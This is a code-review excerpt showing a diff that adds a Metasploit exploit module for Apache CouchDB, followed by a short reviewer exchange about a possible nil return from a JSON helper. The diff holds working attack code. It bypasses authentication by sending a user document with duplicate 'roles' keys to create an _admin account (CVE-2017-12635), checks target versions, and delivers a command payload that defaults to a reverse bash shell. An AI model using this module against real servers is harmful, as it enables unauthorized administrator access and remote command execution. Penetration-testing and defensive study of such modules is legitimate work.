modules/exploits/linux/http/apache_couchdb_cmd_exec.rb

```diff
@@ -0,0 +1,371 @@
+        [ 'URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
+      ],
+      'DisclosureDate' => 'Apr 6 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 4096, # Has into account Apache request length and base64 ratio
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd cmd_bash',
+              'RequiredCmd' => 'python gawk bash-tcp perl telnet netcat ruby openssl',
+            }
+        },
+      'DefaultOptions' => {
+        'PAYLOAD'         => 'cmd/unix/reverse_bash'
+        },
+      'Targets'        => [
+        ['Automatic',            {} ]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      Opt::RPORT(5984),
+      OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),
+      OptString.new('HttpUsername', [false, 'The username to login as']),
+      OptString.new('HttpPassword', [false, 'The password to login with'])
+    ])
+  end
+
+  def check
+
+    version = get_version
+
+    case
+    when !version
+      return Exploit::CheckCode::Unknown
+    when version < '1.7.0'
+      return Exploit::CheckCode::Appears
+    when version.between?('2.0.0','2.1.0')
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+  end
+
+  def exploit
+    @exploit_flag = false
+    version = get_version
+
+    vprint_good("#{peer} - Authority bypass successful") if auth_bypass
+
+    start_http_server
+
+    (1..3).each do |i|
+      print_status("#{peer} - The #{i} time to exploit")
+      send_payload(version)
+      Rex::sleep(3)
+      # break if we get the shell
+      break if @exploit_flag
+    end
+  end
+
+  # CVE-2017-12635
+  # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
+  # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
+  # for the newly created user.
+  def auth_bypass
+
+    username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    @auth = basic_auth(username, password)
+
+    res = send_request_cgi(
+      'uri'           => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
+      'method'        => 'PUT',
+      'ctype'         => 'application/json',
+      'data'          => %Q{{"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"}}
+    )
+
+    if res && res.code == 200 && res.get_json_document['ok']
```

Comment:
I do believe `get_json_document` can potentially return `nil`, which won't "dereference" correctly here and can crash the module. I might be wrong.

Reply:
Seems legit.

```ruby
2.3.0 :001 > require 'json'
 => true 
2.3.0 :002 > json = {}
 => {} 
2.3.0 :003 > puts 'no crash' if json['ok']
 => nil 
2.3.0 :004 > 
```

Reply:
Nah, I just misremembered. Empty hash is okay. Looks like I did the same as you in my own code. :-)